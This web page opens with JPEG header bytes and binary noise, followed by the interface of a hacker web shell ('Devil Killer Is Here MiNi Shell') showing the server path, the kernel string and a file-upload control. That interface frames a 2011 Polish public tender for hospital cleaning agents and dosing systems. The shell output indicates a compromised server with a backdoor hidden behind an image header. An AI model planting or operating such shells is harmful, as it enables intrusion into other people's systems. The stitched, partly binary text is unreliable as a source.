JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110218/24848-N-2011.html

<p class="kh_header"><b>Radom: Zakup i dostawa środków myjących w systemie dozującym dla potrzeb Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 24848 - 2011; data zamieszczenia: 18.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa środków myjących w systemie dozującym dla potrzeb Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa środków myjących w systemie dozującym dla potrzeb Radomskiego Szpitala Specjalistycznego:
Część nr  1-  Środki do mycia podłóg, szyb, glazury i sanitariów
I. Wymagania dotyczące środków czystości:
Lp.	Nazwa towaru	Ilość/ litr
1.	Środek myjąco-pielęgnacyjny do mycia podłóg
-	środek do mycia i konserwacji wszystkich podłóg
-	do systematycznego stosowania, nadaje się do powierzchni tarketowych, w tym zabezpieczonych akrylem
-	nie pozostawiający smug i nie niszczący powierzchni
-	zapobiegający ślizganiu, zawierający anionowe środki powierzchniowo czynne, nie zawierający mydła
-	myje i konserwuje posadzkę w jednym cyklu pracy
-	możliwość użycia do maszynowego sprzątania
-	przygotowywanie roztworów roboczych z dozowników automatycznych.
-	 orientacyjne zapotrzebowanie na okres 24 miesięcy 3.600l koncentratu uwaga do obliczenia wzięto pod uwagę przykładową wydajność 1000l roztworu roboczego z 1 l koncentratu	3.600
2.	Środek czyszczący do wszystkich powierzchni zmywalnych: glazura, meble, powierzchnie laminowane itp. w tym do powierzchni błyszczących (szyby, lustra, przeszklenia)
-	skutecznie usuwający tłuste plamy oraz inne zabrudzenia
-	 nie pozostawiający smug, posiada przyjemny zapach
-	nie powoduje podrażnień skóry
-	przygotowanie roztworu roboczego z zastosowaniem automatycznego dozownika
- orientacyjne zapotrzebowanie na okres 24 miesięcy 2.160l koncentratu uwaga do obliczenia wzięto pod uwagę przykładową wydajność 1000l roztworu roboczego z 1 l koncentratu
-	2.160
3.	Środek do gruntowego i codziennego mycia urządzeń sanitarnych
-	skutecznie usuwający resztki mydła, osady mineralne (kamień osadowy)
-	nie niszczący czyszczonych powierzchni, nie pozostawia smug, posiadający właściwości neutralizujące nieprzyjemne zapachy
-	nie zawierający kwasu fosforowego
-	ulega rozkładowi biologicznemu
-	przygotowanie roztworu roboczego z zastosowaniem automatycznego dozownika
-	orientacyjne zapotrzebowanie na okres 24 miesięcy 4.800l koncentratu uwaga do obliczenia wzięto pod uwagę przykładową wydajność 200l roztworu roboczego z 1 l koncentratu	4.800

II. Wymagania dotyczące dozowników automatycznych
1. Parametry wymagane:
-	dozownik - stacjonarne urządzenie przepływowe montowane na ścianie podłączone do instalacji wodnej
-	przystosowane do b. precyzyjnego dozowania produktów chemicznych w stężeniach od 0,1-1,0% (dodatkowo możliwość przygotowania roztworu o wyższym stężeniu)
-	urządzenie umożliwiające szybkie napełnienie wiader roztworem środka myjącego oraz dające możliwość bezpiecznego napełnienia roztworem butelki ze spryskiwaczem oraz mniejszych butelek
-	urządzenie posiadające przełącznik do łatwego i prostego pobrania wybranego produktu roboczego
-	posiadające zabezpieczenie przed możliwości użycia przez osoby niepowołane
-	posiadające zabezpieczenie przed dostaniem się środka chemicznego bądź jego roztworu do instalacji wodnej
-	obudowa dozownika łatwa do utrzymania w czystości, odporna na mechaniczne uszkodzenia oraz działanie środków chemicznych
-	na urządzeniu wydzielone miejsce na oznakowanie (naklejkę) środka zawartego 
w dozowniku.
2. Wykonawca jest zobowiązany do zapewnienia systemów dozujących w ilości 53 szt. dla każdego środka chemicznego (dopuszcza się dozowniki tylko dla jednego środka lub dla dwóch lub trzech wymaganych środków).
3. Wykonawca zobowiązany jest do użyczenia i zamontowania systemów dozujących 
w miejscu wskazanym przez Zamawiającego (przy ujęciach wody) na czas trwania umowy.
4. Systemy dozujące są własnością Wykonawcy i po terminie, w którym strony przestają być związane umową podlegają demontażowi przez Wykonawcę na własny koszt.
5. Wykonawca zobowiązany jest przynajmniej raz na kwartał dokonać przeglądu dozowników w celu sprawdzenia i regulacji stężeń środków chemicznych przez cały okres trwania umowy. Wykonawca jest zobowiązany do potwierdzenia wykonania przeglądu dozowników na piśmie. W przypadku awarii dozownika Wykonawca zobowiązany jest do usunięcia wady w ciągu 3 dni od daty otrzymania zgłoszenia. 
W przypadku gdy usunięcie awarii będzie wymagało więcej czasu Wykonawca zobowiązany jest zamontować zastępczy dozownik
6. Zamawiający zastrzega, że ilość dozowników może ulec zmianie ze względu na potrzebę ich zamontowania w innym miejscu albo ich likwidację. O wszelkich zmianach Wykonawca zostanie powiadomiony na piśmie.
7. Wykonawca zobowiązany jest do załączenia do oferty katalogów lub szczegółowych opisów oferowanych dozowników.

Część nr 2- Środki myjąco-dezynfekujące do powierzchni mających kontakt z żywnością
I. Wymagania dotyczące środków myjąco- dezynfekujących:
Lp.	Nazwa towaru	Ilość /litr
1.Płyn do odkamieniania
Kotłów parowych wykonanych ze stali nierdzewnej,
Środek do usuwania osadów wapiennych posiadających w swoim składzie 30% kwasu fosforowego/ dozownik  w formie rozpryskiwacza	100
2.Płyn do dezynfekcji powierzchni zaplecza kuchennego
Ścian, podłóg, okapów, glazury, stołów produkcyjnych, maszyn oraz wyposażenia ze stali nierdzewnej, tworzyw sztucznych
Środek dezynfekujący na bazie amin czwartorzędowych,  substancja aktywna - chlorek didecylodimetyloamoniowy posiadający zezwolenie jako środek biobójczy działający grzybobójczo i bakteriobójczo. Przygotowanie roztworów roboczych za pomocą dozownika
Orientacyjne zapotrzebowanie na okres 24 m-cy 140l koncentratu uwaga do obliczenia wzięto pod uwagę przykładową wydajność 50l roztworu roboczego z 1 l koncentratu	140
3.Środek do czyszczenia przypalonych tłuszczy w piekarnikach elektrycznych, wykonanych z elementów ze stali nierdzewnej kwasoodpornej, działający samoczynnie bez szorowania, na bazie wodorotlenku potasu 15-25%. / dozowanie za pomocą rozpryskiwacza	16
4.Środek do mycia powierzchni zmywalnych
Ścian, podłóg, glazury, stołów produkcyjnych, maszyn oraz wyposażenia 
ze stali nierdzewnej, tworzyw sztucznych,
Środek do mycia dużych powierzchni, skutecznie rozpuszczający tłuszcze, nieszkodliwy dla środowiska, zawierający wodorotlenek sodu oraz substancje ochronne. Przygotowywanie roztworów roboczych za pomocą dozownika. 
Orientacyjne zapotrzebowanie na okres 24 m-cy 260l koncentratu uwaga do obliczenia wzięto pod uwagę przykładową wydajność 100l roztworu roboczego z 1 l koncentratu	260

II. Wymagania dotyczące systemów dozujących:
1. Wykonawca jest zobowiązany do zapewnienia systemów dozujących  z wężem ok. 10m pod ciśnieniem w ilości 3 szt.(dozowniki będą stosowane do środków opisanych w poz. 2 i 4).
2. Wykonawca zobowiązany jest do użyczenia i zamontowania systemów dozujących 
w miejscu wskazanym przez Zamawiającego (przy ujęciach wody ciepłej) na czas trwania umowy.
3. Systemy dozujące są własnością Wykonawcy i po terminie, w którym strony przestają być związane umową podlegają demontażowi przez Wykonawcę na własny koszt.
4. Wykonawca zobowiązany jest przynajmniej raz na kwartał dokonać przeglądu dozowników w celu sprawdzenia i regulacji stężeń środków chemicznych przez cały okres trwania umowy. Wykonawca jest zobowiązany do potwierdzenia wykonania przeglądu dozowników na piśmie. W przypadku awarii dozownika Wykonawca zobowiązany jest do usunięcia wady w ciągu 3 dni od daty otrzymania zgłoszenia. 
W przypadku gdy usunięcie awarii będzie wymagało więcej czasu Wykonawca zobowiązany jest zamontować zastępczy dozownik
5. Zamawiający zastrzega, że ilość dozowników może ulec zmianie ze względu na potrzebę ich zamontowania w innym miejscu albo ich likwidację. O wszelkich zmianach Wykonawca zostanie powiadomiony na piśmie.
6. Wykonawca zobowiązany jest do załączenia do oferty katalogów lub szczegółowych opisów oferowanych dozowników..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 39.83.13.00-9, 39.83.16.00-2, 39.83.12.20-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada uprawnienia do wykonywania określonej działalności, jeżeli: wykaże, że posiada: pozwolenie na obrót produktami biobójczymi zgodne z ustawą z dnia 13.09.2002r o produktach Biobójczych Dz. U. Nr 175 poz. 1433 ze zm.)- dotyczy jedynie poz. 2 określonej dla części nr 2- środki myjąco-dezynfekujące do powierzchni mających kontakt 
z żywnością.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie, jeżeli wykaże, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał dostawy oferowanego towaru: 
Dla części nr 1 - na kwotę min. 146.782,00 PLN,
Dla części nr 2 - na kwotę min.  6.330,00 PLN
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- ulotki informacyjne dla każdego zaoferowanego produktu
- karty charakterystyki preparatów</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania jeżeli ofertę składa pełnomocnik.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące zmiany umowy:
a) Ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa- mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto.
b) Przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
ul. Lekarska 4 piętro III pokój nr 313
26-610 Radom.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2011 godzina 11:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
ul. Lekarska 4 piętro III pokój nr 313
26-610 Radom.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Środki do mycia podłóg, szyb, glazury i sanitariów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Wymagania dotyczące środków czystości:
Lp.	Nazwa towaru	Ilość/ litr
1.	Środek myjąco-pielęgnacyjny do mycia podłóg
-	środek do mycia i konserwacji wszystkich podłóg
-	do systematycznego stosowania, nadaje się do powierzchni tarketowych, w tym zabezpieczonych akrylem
-	nie pozostawiający smug i nie niszczący powierzchni
-	zapobiegający ślizganiu, zawierający anionowe środki powierzchniowo czynne, nie zawierający mydła
-	myje i konserwuje posadzkę w jednym cyklu pracy
-	możliwość użycia do maszynowego sprzątania
-	przygotowywanie roztworów roboczych z dozowników automatycznych.
-	 orientacyjne zapotrzebowanie na okres 24 miesięcy 3.600l koncentratu uwaga do obliczenia wzięto pod uwagę przykładową wydajność 1000l roztworu roboczego z 1 l koncentratu	3.600
2.	Środek czyszczący do wszystkich powierzchni zmywalnych: glazura, meble, powierzchnie laminowane itp. w tym do powierzchni błyszczących (szyby, lustra, przeszklenia)
-	skutecznie usuwający tłuste plamy oraz inne zabrudzenia
-	 nie pozostawiający smug, posiada przyjemny zapach
-	nie powoduje podrażnień skóry
-	przygotowanie roztworu roboczego z zastosowaniem automatycznego dozownika
- orientacyjne zapotrzebowanie na okres 24 miesięcy 2.160l koncentratu uwaga do obliczenia wzięto pod uwagę przykładową wydajność 1000l roztworu roboczego z 1 l koncentratu 2.160
3.	Środek do gruntowego i codziennego mycia urządzeń sanitarnych
-	skutecznie usuwający resztki mydła, osady mineralne (kamień osadowy)
-	nie niszczący czyszczonych powierzchni, nie pozostawia smug, posiadający właściwości neutralizujące nieprzyjemne zapachy
-	nie zawierający kwasu fosforowego
-	ulega rozkładowi biologicznemu
-	przygotowanie roztworu roboczego z zastosowaniem automatycznego dozownika
-	orientacyjne zapotrzebowanie na okres 24 miesięcy 4.800l koncentratu uwaga do obliczenia wzięto pod uwagę przykładową wydajność 200l roztworu roboczego z 1 l koncentratu	4.800
II. Wymagania dotyczące dozowników automatycznych
1. Parametry wymagane:
-	dozownik - stacjonarne urządzenie przepływowe montowane na ścianie podłączone do instalacji wodnej
-	przystosowane do b. precyzyjnego dozowania produktów chemicznych w stężeniach od 0,1-1,0% (dodatkowo możliwość przygotowania roztworu o wyższym stężeniu)
-	urządzenie umożliwiające szybkie napełnienie wiader roztworem środka myjącego oraz dające możliwość bezpiecznego napełnienia roztworem butelki ze spryskiwaczem oraz mniejszych butelek
-	urządzenie posiadające przełącznik do łatwego i prostego pobrania wybranego produktu roboczego
-	posiadające zabezpieczenie przed możliwości użycia przez osoby niepowołane
-	posiadające zabezpieczenie przed dostaniem się środka chemicznego bądź jego roztworu do instalacji wodnej
-	obudowa dozownika łatwa do utrzymania w czystości, odporna na mechaniczne uszkodzenia oraz działanie środków chemicznych
-	na urządzeniu wydzielone miejsce na oznakowanie (naklejkę) środka zawartego 
w dozowniku.
2. Wykonawca jest zobowiązany do zapewnienia systemów dozujących w ilości 53 szt. dla każdego środka chemicznego (dopuszcza się dozowniki tylko dla jednego środka lub dla dwóch lub trzech wymaganych środków).
3. Wykonawca zobowiązany jest do użyczenia i zamontowania systemów dozujących 
w miejscu wskazanym przez Zamawiającego (przy ujęciach wody) na czas trwania umowy.
4. Systemy dozujące są własnością Wykonawcy i po terminie, w którym strony przestają być związane umową podlegają demontażowi przez Wykonawcę na własny koszt.
5. Wykonawca zobowiązany jest przynajmniej raz na kwartał dokonać przeglądu dozowników w celu sprawdzenia i regulacji stężeń środków chemicznych przez cały okres trwania umowy. Wykonawca jest zobowiązany do potwierdzenia wykonania przeglądu dozowników na piśmie. W przypadku awarii dozownika Wykonawca zobowiązany jest do usunięcia wady w ciągu 3 dni od daty otrzymania zgłoszenia. 
W przypadku gdy usunięcie awarii będzie wymagało więcej czasu Wykonawca zobowiązany jest zamontować zastępczy dozownik
6. Zamawiający zastrzega, że ilość dozowników może ulec zmianie ze względu na potrzebę ich zamontowania w innym miejscu albo ich likwidację. O wszelkich zmianach Wykonawca zostanie powiadomiony na piśmie.
7. Wykonawca zobowiązany jest do załączenia do oferty katalogów lub szczegółowych opisów oferowanych dozowników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 39.83.13.00-9, 39.83.16.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
